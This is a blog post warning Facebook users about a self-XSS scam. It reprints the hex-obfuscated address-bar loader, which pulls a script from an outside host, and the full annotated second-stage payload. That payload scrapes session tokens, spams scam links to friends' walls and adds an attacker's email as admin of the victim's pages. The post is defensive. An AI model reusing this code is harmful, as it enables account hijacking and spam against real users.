Protect yourself against fraud & identity theft on Facebook – More scripts!

Due to the increased interest people have in this matter and to the fact that the JavaScript/Facebook scams are becoming way too common, I feel compelled to follow up and present another script used to … steal your Facebook information, impersonate you and everything you can think of …

For those of you unfamiliar with what I am talking about, please first read my previous post.
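Please remember: Never paste or type any JavaScript or any other script into your browser’s address bar! A script entered there runs inside the page you currently have open, with the rights of your logged-in session. It is almost certainly designed to steal something from you, whether we are talking about Facebook or something else.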

I admit I have not tested this script myself (unlike the first script, which I did try 🙂). Let’s hope it is not a functional one and that not many people have used it, but as I see it the internet will soon be flooded with such scripts, if it is not already! The problem is that people usually do not become alarmed until their Facebook is already full of spam, and at that point some do not know what the problem is or what they need to do.

The answer is simple: Log out, then log in again, reset your personal publishing address, and leave the groups you have been forcibly opted into.

Here is the script that I have found posted by many … in some Serbian Facebook group…

// Address-bar loader exactly as it was posted. Every string in the table is
// \x-hex-escaped, so a reader cannot tell at a glance which DOM property
// names and which URL the one-liner uses; the hex escapes are the only
// obfuscation present.
// NOTE(review): the fourth table entry is wrapped across two lines in this
// listing; the decoded listing further down shows it as one string.
javascript:
var _0x9557=[
“\x73\x72\x63”,
“\x73\x63\x72\x69\x70\x74”,
“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74”,
“\x2f\x2f\x69\x67\x72\x65\x2d\x6b\x75\x68\x61\x6e\x6a\x61
\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73\x3f\x73\x68”,
“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64”,
“\x62\x6F\x64\x79”];
// Calls document[entry 2](entry 1), assigns entry 3 to the property named by
// entry 0 of the result, then calls document[entry 5][entry 4] with it.
// All lookups go through the table, so the statement only becomes readable
// once the escapes are decoded.
(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];
b[_0x9557[5]][_0x9557[4]](a);
// void (0) makes the javascript: URL evaluate to undefined, so the browser
// stays on the page that is already open instead of navigating away.
void (0);

Translated into a human readable form:

// Same loader with the hex escapes decoded. The host name in the fourth
// entry is written with underscores in this listing, so it does not resolve
// or link as printed.
javascript:
var _0x9557=[
“src”,
“script”,
“createElement”,
“//i_g_r_e-k_u_h_a_n_j_a.com/fb/b.js?sh”,
“appendChild”,
“body”];
// Decoded through the table this reads: a = document.createElement("script");
// a.src = <entry 3>; document.body.appendChild(a).
// The URL in entry 3 starts with "//", i.e. it is protocol-relative and takes
// the scheme of the page that is open. Because the element is appended to the
// current document, the fetched script runs in that page's origin with the
// logged-in user's session. This is why pasting the one-liner is enough:
// no password is ever asked for.
(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];
b[_0x9557[5]][_0x9557[4]](a);
// Evaluates to undefined so the address-bar navigation does not replace the page.
void (0);

Next we check the website in question for the b.js script that the first script loads. Looking at this script I was even a bit surprised: there are beautiful explanations, directly in the code, of how the script steals from you. So, with no more useless comments, here is the script:

// Second-stage payload (b.js) pulled in by the address-bar loader.
// Every request below uses a relative URL, so it is same-origin to the page
// the victim has open and the browser attaches the session cookies by itself.
// Seen from the server, the traffic is authenticated AJAX carrying valid
// form tokens; what stands out is the pattern: identical status text sent to
// up to 25 different targets at one post every 2 seconds.
// NOTE(review): the listing was published with typographic quotes and one
// truncated loop header (marked below); it is kept exactly as published.
//These are to be posted as status messages
// The two strings differ only by the trailing space at the end of txt.
txt = “Nevjerojatni šokantni video obavezno pogledaj http://www.facebook.com/pages/Sokantni-video/176064629096511 “;
txtee = “Nevjerojatni šokantni video obavezno pogledaj http://www.facebook.com/pages/Sokantni-video/176064629096511”;

// Stalling dialog shown to the victim; the text is roughly "Wait a couple of
// minutes, a check is in progress. Then click OK to continue."
alert(“Sačekajte par minuta, u toku je provera. Pa kliknite OK da nastavite.”);
// Inside with(...), open / onreadystatechange / send resolve against the new
// XMLHttpRequest; the comma expression configures the request and the
// trailing send(null) at the very end of the listing fires it.
// Step 1: fetch the home page ("/") as the logged-in user.
with(x = new XMLHttpRequest()) open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
z=x.responseText;
//comp = z.match(/name=”UIComposer_STATE_PIC_OUTSIDE” value=”([\d\w]+)”/i)[1];
// comp = x.responseText.match(/name=”UIComposer_STATE_PIC_OUTSIDE” id=”([\d\w]+)”/i)[1];
// Scrapes the hidden form fields post_form_id and fb_dtsg out of the returned
// HTML (presumably the anti-CSRF tokens, as a later comment also guesses).
// Such tokens do not help once hostile script runs inside the origin: it can
// read them from the page like any legitimate script.
// form and pfid are filled by the same pattern and hold the same value.
// Each .match(...)[1] throws if the pattern is absent, which stops the handler.
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];

// Step 2: request the friend list for the uid read from the c_user cookie.
// Only c_user is read from document.cookie here; no other cookie value is
// used by the visible code.
with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” +
document.cookie.match(/c_user=(\d+)/)[1] +
“&filter=all&__a=1&__d=1”),
onreadystatechange = function () {
//extracts list of friends

if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
//facebook returns list of friends images of the form of three numbers separated by _,
//the above regular expression extracts out the middle of the two
//(which infact is the userID of friend)
i = 0;
llimit=25;
// Step 3: timer callback, one run every 2000 ms. After llimit runs it
// returns early, but the interval handle t is never cleared in the visible
// code, so the callback keeps firing as a no-op while the page stays open.
t = setInterval(function () {
if (i >= llimit )
return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
if(i == 0) {//do it only once
// Step 3a (first tick only): fetch the manage-pages dialog, pull every
// \"id\":<digits> occurrence out of the response, and POST to /pages/edit
// with sk=admin for each id, passing the scraped tokens and a hard-coded
// e-mail address in friendselector_input.
// Remediation this implies for anyone who ran the script: review the admin
// list of every page the account manages, in addition to the steps in the
// article.
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function() {
if(ddddd.readyState == 4 && ddddd.status == 200) {
llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); len =llm.length;
j=0;
// NOTE(review): the loop header on the next line is truncated as published;
// the text between "j" and "with" is missing (possibly lost when the page
// was rendered as HTML). Left untouched.
for(j=0;j with(xxxcxxx = new XMLHttpRequest()) open(“POST”, “/pages/edit/?id=”+llm[j].replace(/\\”id\\”:/i, “”)
+”&sk=admin”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“post_form_id=”+pfid+”&fb_dtsg=”+dt+”&fbpage_id=”+llm[j].replace(/\\”id\\”:/i, “”)+
“&friendselector_input%5B%5D=miroantic%40net.hr%09&friend_selected%5B%5D=&save=1”);
//I am not very sure on this one but it seems it adds as admin of all pages the user holds
}
}
}, send(null); //end of function to change the admins
// this one collects cookie as well as the personalized status update email address
// (a photo sent to that address is posted on the wall directly)
// NOTE(review): no request in the visible code sends a cookie or a publishing
// address anywhere; the two comment lines above may describe code that is not
// part of this listing. Confirm against the original file.
}
//following code does status update
//the code writes message represented by txt and txtee alternately on the wall of friends.
//txt and txtee are same though (may be author’s mistake)
// Step 3b (every tick): POST a status update whose target_id is a randomly
// chosen entry of m. Even ticks send txt, odd ticks send txtee; apart from
// that the two branches build the same request.
if(i%2==0)
{
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt +
“&target_id=” + m[Math.floor(Math.random() * m.length)] +
//m is an array of id of friends (was created early in the script exec), choose a random friend
“&composer_id=” +
“&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” +form + “&fb_dtsg=” + dt +
//comp, form, dt are (probably) XSRF prevention tokens
“&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else
{
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1”),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee +
“&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=”+
“&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt +
“&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
i += 1;
}, 2000);// 2000 milli-sec window, after which the script is executed again
}
}, send(null);
}
}, send(null);

The comments inside the script are self explanatory.


2 Responses to “Protect yourself against fraud & identity theft on Facebook – More scripts!”

  1. Useful for me » Blog Archive » Protect yourself against fraud & identity theft on Facebook – FAKE Facebook Time Checker ! Says:
    January 23rd, 2011 at 12:01 pm

    […] users are also tricked into using a different form of script. I have dedicated another post for this one. The principle is the same. One would insert a JavaScript into browser address bar that loads in […]

  2. Üble JavaScript-Schadsoftware für Facebook « Unser täglich Spam Says:
    January 24th, 2011 at 8:47 am

    […] wurden mit einer etwas anderen Form dieses Skriptes ausgetrickst. Für dieses andere Skript habe ich einen eigenen Post verfasst. Das Prinzip ist das gleiche. Etwas JavaScript wird in die Adresszeile des Browsers eingefügt, […]
